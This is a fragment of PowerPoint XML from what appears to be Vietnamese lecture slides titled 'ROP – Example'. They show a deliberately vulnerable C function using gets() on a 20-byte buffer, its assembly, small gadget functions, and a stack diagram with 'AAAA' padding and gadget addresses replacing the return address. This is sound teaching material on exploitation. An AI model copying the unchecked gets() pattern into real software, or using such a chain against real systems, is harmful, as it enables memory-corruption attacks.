                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272ADBE8-2E0B-AC85-FF01-9CF54F53430C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5580447" y="4038600"/>
              <a:ext cx="315755"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34D068-4E0E-BE1D-5100-A735955F841D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5580447" y="2971800"/>
              <a:ext cx="0" cy="10668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21D4BB-FD18-ED62-6F4E-68C200DDCC82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5029200" y="2971800"/>
              <a:ext cx="551247" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">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6A4FA52-D86B-2445-0C6D-89E5ACDCB65F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4876802" y="1600206"/>
            <a:ext cx="1013922" cy="2117214"/>
            <a:chOff x="5011353" y="2621280"/>
            <a:chExt cx="867002" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED9E8FB-4355-547A-85B7-3B239C580555}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5562600" y="3688080"/>
              <a:ext cx="315755"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19C227-B7FC-5FD5-1490-34FD65052199}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5562600" y="2621280"/>
              <a:ext cx="0" cy="106680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5E703C-9865-0E40-C885-E744E2E42DB3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5011353" y="2621280"/>
              <a:ext cx="551247" cy="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D67939B-1257-0D48-E20F-FA6FA45257A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2480536" y="4197281"/>
            <a:ext cx="762000" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D264A98-0C75-EC08-54BE-5F7BC15E2EA9}"/>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32" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D133360A-6363-310F-1FE5-EB1635E68DF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3" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302CFF30-3822-F9CD-A011-79000BF35BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5095459" y="3946020"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4C8F0C-39CB-5A86-E555-5CF17289378E}"/>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35" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4618802-246D-4E2D-5A8D-4A5C04A12553}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="34"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994766D4-45D6-FBE1-C477-376107B7C0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="4189532"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE70F655-E18B-E362-3F02-E72A65CA2013}"/>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38" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE49C42-51A6-05B0-4FF6-C38F849633EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="37"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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41A55F41-FBF9-145B-A53E-A8C9DDA09021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8591550" y="4189532"/>
            <a:ext cx="552450" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1"/>
              <a:t>SFP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2023184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A66-9A2B-6D9A-3D99-10EB0CA69E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ROP – Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DCBC90-D539-9271-9929-EA9688737DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F6A6A8-18B6-6E09-ACAD-9708BAEFF6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>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kumimoji="0" lang="en" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of &lt;foo+10&gt;]</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kumimoji="0" lang="en" sz="14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rPr>
                        <a:t>[address of &lt;bar+25&gt;]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx2">
                            <a:lumMod val="75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b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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14" name="Google Shape;626;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5831716D-1000-8051-095E-11CB69DD80E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022476" y="1075800"/>
            <a:ext cx="1998648" cy="443195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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>foo:</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A64D79"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor %eax, %ebx</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="7030A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bar:</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and $1, %edx</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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    mov $1, %eax</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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vulnerable:</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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    call gets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:b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mov %ebp,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r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pop %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">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r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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main:</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call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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;629;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B581F3A3-18E5-857C-6A41-CAB872EC5BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217200" y="2954875"/>
            <a:ext cx="2256950" cy="2031295"/>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100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void vulnerable(void)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char name[20];</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gets(name);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int main(void)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return 0;</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFAF1B3-C6BD-4B1C-5621-8783C40CC8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4648200" y="2743200"/>
            <a:ext cx="1248002" cy="1295400"/>
            <a:chOff x="5029200" y="2971800"/>
            <a:chExt cx="867002" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272ADBE8-2E0B-AC85-FF01-9CF54F53430C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5580447" y="4038600"/>
              <a:ext cx="315755"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34D068-4E0E-BE1D-5100-A735955F841D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5580447" y="2971800"/>
              <a:ext cx="0" cy="10668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21D4BB-FD18-ED62-6F4E-68C200DDCC82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5029200" y="2971800"/>
              <a:ext cx="551247" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">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6A4FA52-D86B-2445-0C6D-89E5ACDCB65F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4876802" y="1600206"/>
            <a:ext cx="1013922" cy="2117214"/>
            <a:chOff x="5011353" y="2621280"/>
            <a:chExt cx="867002" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED9E8FB-4355-547A-85B7-3B239C580555}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5562600" y="3688080"/>
              <a:ext cx="315755"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19C227-B7FC-5FD5-1490-34FD65052199}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5562600" y="2621280"/>
              <a:ext cx="0" cy="106680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5E703C-9865-0E40-C885-E744E2E42DB3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5011353" y="2621280"/>
              <a:ext cx="551247" cy="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D67939B-1257-0D48-E20F-FA6FA45257A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2527250" y="2548707"/>
            <a:ext cx="762000" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D264A98-0C75-EC08-54BE-5F7BC15E2EA9}"/>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32" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D133360A-6363-310F-1FE5-EB1635E68DF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3" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302CFF30-3822-F9CD-A011-79000BF35BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5120948" y="3662786"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4C8F0C-39CB-5A86-E555-5CF17289378E}"/>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35" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4618802-246D-4E2D-5A8D-4A5C04A12553}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="34"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994766D4-45D6-FBE1-C477-376107B7C0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="4189532"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE70F655-E18B-E362-3F02-E72A65CA2013}"/>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38" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE49C42-51A6-05B0-4FF6-C38F849633EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="37"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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702934E9-ED4B-9466-237D-68DCEAF5F706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8591550" y="4189532"/>
            <a:ext cx="552450" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1"/>
              <a:t>SFP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1209664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A66-9A2B-6D9A-3D99-10EB0CA69E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ROP – Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DCBC90-D539-9271-9929-EA9688737DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F6A6A8-18B6-6E09-ACAD-9708BAEFF6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1447800"/>
          <a:ext cx="2714397" cy="4885440"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{22838BEF-8BB2-4498-84A7-C5851F593DF1}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="669303">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="46736303"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="669304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4047237489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="680689">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3963183214"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="695101">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4143032466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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45259538"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="259664">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GB" sz="1400" b="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>...</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44131556"/>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92364639"/>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10857518"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="259664">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
